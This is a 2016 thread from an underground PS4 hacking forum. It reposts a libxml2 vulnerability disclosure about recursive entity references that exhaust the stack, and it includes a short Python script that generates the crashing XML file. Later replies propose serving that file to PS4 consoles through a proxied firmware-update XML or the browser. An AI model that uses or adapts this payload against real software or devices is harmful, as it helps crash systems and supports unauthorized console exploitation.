Underground PS4 discussions
Forum rules: Forum rule Nº 15 is strictly enforced in this subforum.
#405071 by dragood2
Wed May 04, 2016 6:05 am
This is a disclosure of the following issue that was raised a week ago
on the distro's mailing list. Both bugs on the gnome bugtracker are
currently private and should be made public now.
A couple of weeks back while working on a related bug [CVE-2016-3627] I
discovered a specially created xml file is capable of triggering a stack
overflow before libxml2 can detect its a invalid xml file.

We raised this issue upstream on 2016-04-18 and informed them that we
would place a two week embargo on the issue in case we didn't here back.
As of yet we have had no response so we have posted here.

We intend to keep the current embargo (ending May 3) unless we get
advise otherwise here. Below is a script to generate the xml file.

The functions xmlParserEntityCheck() and xmlParseAttValueComplex() used
to call xmlStringDecodeEntities() in a recursive context without incrementing the 'depth' counter in the parser context. Because of that omission, the parser
failed to detect attribute recursions in certain documents before running out
of stack space.

Hope this helps guide those that have the skill to take it further.
Last edited by dragood2 on Thu May 05, 2016 3:45 am, edited 2 times in total.
#405072 by dragood2
Wed May 04, 2016 6:06 am

f = open('repo.xml', 'w')

f.write( "<!DOCTYPE a [ ")

i = 1

while (i < 30000):
f.write ("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">")
i = i+1

f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">")

#405077 by wololo
Wed May 04, 2016 9:56 pm
It would be interesting to understand where the PS4 uses libxml2. I seem to recall lots of the data coming from the servers to display online information might be in xml format, wondering if it's encrypted though (in which case a proxy to serve the file for tests might not be enough). How about the browser?

Appreciate if people chime in on this one. There's a file to repro on the bugzilla link, for those too lazy to run the script from dragood2 :)
#405078 by lazydog2055
Thu May 05, 2016 12:02 am
looks like there was also an xml exploit in ios and osx. http://www.cvedetails.com/cve/CVE-2016-1762/

I remember with the beta firmwares sony would push a special xml to the consoles telling them to download the fw based off of some info (likely console id). With updates they also use an xml referred from a link that a proxy would be able to see. If we instead point it to the xml in question ??? Might give this a try if I can set Charles up properly. It seems too simple and wouldn't surprise me if the Web browser comes to be key.

Who is online

Users browsing this forum: No registered users and 3 guests